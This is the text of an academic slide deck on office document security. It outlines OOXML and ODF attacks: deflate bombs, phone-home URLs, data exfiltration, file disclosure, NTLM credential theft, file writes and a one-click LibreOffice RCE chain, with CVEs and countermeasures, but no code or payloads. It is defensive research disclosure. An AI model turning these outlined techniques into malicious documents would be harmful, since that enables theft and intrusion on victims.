Office Document Security and Privacy
Jens Müller, Fabian Ising, Christian Mainka, Vladislav Mladenov, Sebastian Schinzel, Jörg Schwenk Overview
1. OOXML/ODF Basics 2. Denial of Service 3. Invasion of Privacy 4. Information Disclosure 5. Data Manipulation 6. Code Execution 7. Evaluation
2 History: Office Wars
• 1990: MS Office 1.0 • 2002: Star Office → OpenOffice.org • 2006: OOXML + ODF standardization • 2010: OpenOffice.org → LibreOffice
3 Two competing standards
OOXML (ISO/IEC 29500) ODF (ISO/IEC 26300)
Office Open XML Open Document Format
6500 pages 800 pages
(some) MS proprietary formats re-use of SVG, MathML, XForms, …
.docx, .xlsx, .pptx, … .odt, .ods, .odp, …
XML-based, Zip container XML-based, Zip container
4 OOXML Directory Structure
5 OOXML Example
6 ODF Directory Structure
7 ODF Example
8 Attacker Model
• Victim opens malicious office document • “Bad things” happen (attack-dependent)
9 Overview
1. OOXML/ODF Basics 2. Denial of Service Deflate Bomb 3. Invasion of Privacy 4. Information Disclosure 5. Data Manipulation 6. Code Execution 7. Evaluation
10 Deflate Bomb
max. compression ratio: 1:1023
11 Overview
1. OOXML/ODF Basics 2. Denial of Service 3. Invasion of Privacy URL Invocation, Evitable Metadata 4. Information Disclosure 5. Data Manipulation 6. Code Execution 7. Evaluation
12 URL Invocation
• Goal: “phone home” to attacker’s server once document is opened
13 URL Invocation
CVE-2020-12802
14 URL Invocation
15
Evitable Metadata Source: news.bbc.co.uk
16 Evitable Metadata
17 Overview
1. OOXML/ODF Basics 2. Denial of Service 3. Invasion of Privacy 4. Information Disclosure Data Exfiltration, File Disclosure, Credential Theft 5. Data Manipulation 6. Code Execution 7. Evaluation
18 Data Exfiltration
• Idea: victim obtains spreadsheet; user input values sent to attacker’s server
19 File Disclosure
• Idea: include local files on disk
20 File Disclosure
21 File Disclosure
22 File Disclosure
23 Credential Theft
• Goal: obtain user’s NTLM hash
24 Credential Theft
• Offline cracking – NTLMv2: modern GPU requires 2,5h for eight chars – NTLMv1, LM: considered broken [Marlinspike2012] • Pass-the-hash or relay attacks – Compare [Ochoa2008, Hummel2009] – Depending on Windows security policy
25 Overview
1. OOXML/ODF Basics 2. Denial of Service 3. Invasion of Privacy 4. Information Disclosure 5. Data Manipulation File Write Access, Content Masking 6. Code Execution 7. Evaluation
20 File Write Access
• Idea: XForms allow local file as target
27 File Write Access
CVE-2020-12803
28 Content Masking: OOXML
29 Content Masking: ODF
Parsed by MS Office Parsed by LibreOffice
30 Overview
1. OOXML/ODF Basics 2. Denial of Service 3. Invasion of Privacy 4. Information Disclosure 5. Data Manipulation 6. Code Execution Macros 7. Evaluation
24 Macros
32 Addition Findings
CVE-2018-8161 (memory corruption)
33 One-Click RCE in LibreOffice
• We can write XML to arbitrary files • LibreOffice config file itself is XML
34 One-Click RCE in LibreOffice
CVE-2020-12803
35 Overview
1. OOXML/ODF Basics 2. Denial of Service 3. Invasion of Privacy 4. Information Disclosure 5. Data Manipulation 6. Code Execution 7. Evaluation
28 Evaluation
37 Countermeasures
• Removing insecure features • User privacy by default • Limitation of resources • Elimination of ambiguities
38 Conclusion
• OOXML and ODF are complex formats • Thorough analysis of dangerous features • One-click pure logic chain RCE in 2020 ;)
Artifacts: https://github.com/RUB-NDS/Office-Security
39